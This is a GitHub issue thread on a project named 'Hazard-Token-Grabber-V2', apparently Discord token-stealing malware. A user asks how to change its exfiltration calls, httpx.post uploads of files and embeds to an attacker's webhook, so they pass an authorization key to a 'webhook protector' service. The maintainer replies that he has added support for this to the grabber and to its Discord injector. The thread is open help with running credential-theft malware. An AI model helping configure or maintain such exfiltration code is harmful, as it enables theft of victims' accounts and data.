### ISSUE TITLE
How to add Your Token Protector

### ISSUE THREAD

**Issue by PandoricGalaxy** [Rdimo/Hazard-Token-Grabber-V2#317]
I will change webhook_url to herkou api url that i got after adding your token protector to and ill add key = (my key)

will this work to send files and embed:?

from
`httpx.post(self.webhook, files={'upload_file': f})`
to
`httpx.post(self.webhook,headers={"Authorization": key}, files={'upload_file': f})`
and from
`httpx.post(self.webhook, json=embed)`
to
`httpx.post(self.webhook,headers={"Authorization": key} json=embed)`

**Comment by Rdimo** [comment]
> I will change webhook_url to herkou api url that i got after adding your token protector to and ill add key = (my key)
> 
> will this work to send files and embed:?
> 
> from `httpx.post(self.webhook, files={'upload_file': f})` to `httpx.post(self.webhook,headers={"Authorization": key}, files={'upload_file': f})` and from `httpx.post(self.webhook, json=embed)` to `httpx.post(self.webhook,headers={"Authorization": key} json=embed)`

you dont have to do anything since im gonna add compatibility with it like right now

**Comment by PandoricGalaxy** [comment]
> > I will change webhook_url to herkou api url that i got after adding your token protector to and ill add key = (my key)
> > will this work to send files and embed:?
> > from `httpx.post(self.webhook, files={'upload_file': f})` to `httpx.post(self.webhook,headers={"Authorization": key}, files={'upload_file': f})` and from `httpx.post(self.webhook, json=embed)` to `httpx.post(self.webhook,headers={"Authorization": key} json=embed)`
> 
> you dont have to do anything since im gonna add compatibility with it like right now

oh thx cause i came to conclusion that i would have to download and edit your discord injector for it too then upload and and edit this too

**Comment by Rdimo** [comment]
> 

alr it works now with the protector, the injection does not work with it yet but it will in a min

**Comment by Rdimo** [comment]
> 

it now works with the injection too, so everything works with https://github.com/Rdimo/Discord-Webhook-Protector now

**Comment by PandoricGalaxy** [comment]
Yay!
